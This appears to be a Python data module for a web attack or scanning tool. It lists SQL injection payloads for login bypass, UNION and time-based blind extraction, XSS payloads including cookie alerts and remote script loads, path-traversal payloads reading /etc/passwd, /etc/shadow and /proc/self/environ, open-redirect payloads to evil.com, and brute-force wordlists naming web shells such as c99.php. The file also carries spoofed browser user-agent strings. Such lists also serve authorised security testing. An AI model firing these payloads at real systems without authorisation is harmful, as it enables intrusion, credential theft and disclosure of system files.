"""Payloads and wordlists for various modules"""

SQL_INJECTION_PAYLOADS = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR '1'='1' /*",
    "admin' --",
    "admin' #",
    "admin' OR '1'='1",
    "admin' OR '1'='1'--",
    "admin' OR '1'='1'#",
    "admin'/*",
    "' OR 1=1--",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR '1'='1",
    "' OR 'x'='x",
    "' OR 'a'='a",
    "1' OR '1' = '1",
    "1' OR 1 -- -",
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL--",
    "' UNION ALL SELECT NULL--",
    "' UNION ALL SELECT NULL,NULL--",
    "' UNION ALL SELECT NULL,NULL,NULL--",
    "1 UNION SELECT NULL--",
    "1 UNION SELECT NULL,NULL--",
    "1 UNION SELECT NULL,NULL,NULL--",
    "' AND 1=1--",
    "' AND 1=2--",
    "1' AND '1'='1",
    "1' AND '1'='2",
    "' AND '1'='1",
    "' AND '1'='2",
    "1 AND 1=1",
    "1 AND 1=2",
    "' AND SLEEP(5)--",
    "1' AND SLEEP(5)--",
    "1 AND SLEEP(5)--",
    "'; WAITFOR DELAY '0:0:5'--",
    "1'; WAITFOR DELAY '0:0:5'--",
    "1; WAITFOR DELAY '0:0:5'--",
    "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
    "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
    "1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
    "' OR SLEEP(5)--",
    "1' OR SLEEP(5)--",
    "1 OR SLEEP(5)--",
    "' ORDER BY 1--",
    "' ORDER BY 2--",
    "' ORDER BY 3--",
    "' ORDER BY 4--",
    "' ORDER BY 5--",
    "1' ORDER BY 1--",
    "1' ORDER BY 2--",
    "1' ORDER BY 3--",
    "1' ORDER BY 4--",
    "1' ORDER BY 5--",
    "' GROUP BY columnnames having 1=1 --",
    "' AND extractvalue(1,concat(0x7e,version()))--",
    "' AND updatexml(1,concat(0x7e,version()),1)--",
    "' AND 1=IF(SUBSTR(version(),1,1)='5',SLEEP(5),0)--",
    "admin'--",
    "admin' or '1'='1'/*",
    "1' or '1'='1'--",
    "1' or '1'='1'/*",
    "1' or '1'='1'#",
    "' or 1=1--",
    "' or 1=1#",
    "' or 1=1/*",
    "' or '1'='1",
    "' or 'x'='x",
    "') or '1'='1'--",
    "') or ('1'='1'--",
]

XSS_PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<script>alert(1)</script>",
    "<script>alert(document.cookie)</script>",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<img src=x onerror=alert('XSS')>",
    "<img src=x onerror=alert(1)>",
    "<img src=x onerror=alert(document.cookie)>",
    "<svg/onload=alert('XSS')>",
    "<svg/onload=alert(1)>",
    "<svg onload=alert(1)>",
    "javascript:alert('XSS')",
    "javascript:alert(1)",
    "<body onload=alert('XSS')>",
    "<body onload=alert(1)>",
    "<iframe src=javascript:alert('XSS')>",
    "<iframe src=javascript:alert(1)>",
    "<input onfocus=alert('XSS') autofocus>",
    "<input onfocus=alert(1) autofocus>",
    "<marquee onstart=alert('XSS')>",
    "<marquee onstart=alert(1)>",
    "<details open ontoggle=alert('XSS')>",
    "<details open ontoggle=alert(1)>",
    "'\"><script>alert(String.fromCharCode(88,83,83))</script>",
    "'\"><script>alert(1)</script>",
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=`javascript:alert('XSS')`>",
    "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
    "\"><script>alert('XSS')</script>",
    "\"><script>alert(1)</script>",
    "';alert(String.fromCharCode(88,83,83))//",
    "';alert(1)//",
    "<img src=x:alert(alt) onerror=eval(src) alt=xss>",
    "<svg><script>alert('XSS')</script></svg>",
    "<svg><script>alert(1)</script></svg>",
    "<div onmouseover='alert(1)'>XSS</div>",
    "<a href='javascript:alert(1)'>XSS</a>",
    "<select onfocus=alert(1)>",
    "<textarea onfocus=alert(1)>",
    "<keygen onfocus=alert(1)>",
    "<video><source onerror='alert(1)'>",
    "<audio src=x onerror=alert(1)>",
    "<style>@import'http://xss.rocks/xss.css';</style>",
    "<link rel='stylesheet' href='http://xss.rocks/xss.css'>",
    "<base href='javascript:alert(1)//'>"
]

DIRECTORY_WORDLIST = [
    "admin", "administrator", "login", "dashboard", "panel", "cpanel", "control",
    "config", "configuration", "settings", "setup", "install", "installation",
    "backup", "backups", "old", "new", "test", "testing", "demo", "dev", "development",
    "api", "v1", "v2", "v3", "rest", "graphql", "swagger",
    "uploads", "upload", "files", "documents", "images", "img", "pics", "pictures",
    "css", "js", "javascript", "styles", "scripts", "assets", "static", "media",
    "wp-admin", "wp-content", "wp-includes", "wordpress",
    "phpmyadmin", "pma", "mysql", "database", "db", "sql",
    "temp", "tmp", "temporary", "cache", "logs", "log",
    "staging", "production", "prod", "uat", "qa",
    ".git", ".svn", ".env", ".htaccess", ".htpasswd",
    "robots.txt", "sitemap.xml", "crossdomain.xml",
    "readme", "README", "README.md", "readme.txt",
    "LICENSE", "license", "license.txt",
    "changelog", "CHANGELOG", "changes",
    "help", "docs", "documentation", "manual",
    "search", "find", "query",
    "users", "user", "accounts", "account", "profile", "profiles",
    "auth", "authentication", "oauth", "sso",
    "api-docs", "api/v1", "api/v2", "swagger-ui",
    "mail", "email", "webmail", "smtp",
    "ftp", "sftp", "ssh",
    "portal", "intranet", "extranet",
    "app", "application", "apps",
    "web", "www", "site",
    "secure", "security", "protected",
    "private", "confidential", "internal",
    "public", "common", "shared",
    "data", "export", "import",
    "report", "reports", "analytics", "stats", "statistics",
    "error", "errors", "404", "500",
    "include", "includes", "lib", "library", "libraries",
    "vendor", "vendors", "third-party",
    "node_modules", "bower_components",
    "debug", "debugger", "trace",
    "xmlrpc.php", "readme.html",
    "info.php", "phpinfo.php", "test.php",
    "shell.php", "c99.php", "r57.php",
    "adminer.php", "phpliteadmin.php",
]

SUBDOMAIN_WORDLIST = [
    "www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "webdisk",
    "ns2", "cpanel", "whm", "autodiscover", "autoconfig", "m", "imap", "test",
    "ns", "blog", "pop3", "dev", "www2", "admin", "forum", "news", "vpn", "ns3",
    "mail2", "new", "mysql", "old", "lists", "support", "mobile", "mx", "static",
    "docs", "beta", "shop", "sql", "secure", "demo", "cp", "calendar", "wiki",
    "web", "media", "email", "images", "img", "www1", "intranet", "portal",
    "video", "sip", "dns2", "api", "cdn", "stats", "dns1", "ns4", "www3", "dns",
    "search", "staging", "server", "ns5", "development", "tcp", "wap", "im",
    "mx1", "www4", "ftp2", "mx2", "jobs", "download", "marketing", "store",
    "remote", "crm", "vpn2", "owa", "en", "ssh", "help", "www5", "backup",
    "git", "stage", "www6", "qa", "pay", "vpn1", "office", "download2",
    "cloud", "ns6", "mx3", "app", "analytics", "billing", "updates", "live",
    "db", "admin2", "fr", "es", "de", "it", "jp", "cn", "ru", "br", "nl",
    "uk", "au", "ca", "in", "mx", "ar", "cl", "co", "za", "kr", "id", "pl",
    "payment", "checkout", "gateway", "api2", "api3", "v2", "v3", "sandbox",
    "testing", "preprod", "uat", "staging2", "dev2", "test2", "alpha", "delta",
]

FILE_EXTENSIONS = [
    "", ".php", ".asp", ".aspx", ".jsp", ".html", ".htm", ".js", ".css",
    ".txt", ".xml", ".json", ".bak", ".old", ".backup", ".zip", ".tar.gz",
    ".sql", ".db", ".sqlite", ".log", ".conf", ".config", ".ini", ".env",
    ".sh", ".bat", ".cmd", ".ps1", ".py", ".rb", ".pl", ".cgi"
]

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15",
]

LFI_PAYLOADS = [
    "../",
    "../../",
    "../../../",
    "../../../../",
    "../../../../../",
    "../../../../../../",
    "../../../../../../../",
    "../../../../../../../../",
    "../../../../../../../../../",
    "../../../../../../../../../../",
    "/etc/passwd",
    "../etc/passwd",
    "../../etc/passwd",
    "../../../etc/passwd",
    "../../../../etc/passwd",
    "../../../../../etc/passwd",
    "../../../../../../etc/passwd",
    "/etc/shadow",
    "/etc/group",
    "/etc/hosts",
    "/etc/motd",
    "/etc/issue",
    "/proc/self/environ",
    "/proc/version",
    "/proc/cmdline",
    "C:\\Windows\\win.ini",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "..\\..\\..\\..\\Windows\\win.ini",
    "..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts",
]

OPEN_REDIRECT_PAYLOADS = [
    "//evil.com",
    "https://evil.com",
    "//google.com",
    "https://google.com",
    "/\\evil.com",
    "//evil.com/%2F..",
    "//evil%E3%80%82com",
    "///evil.com",
    "////evil.com",
]
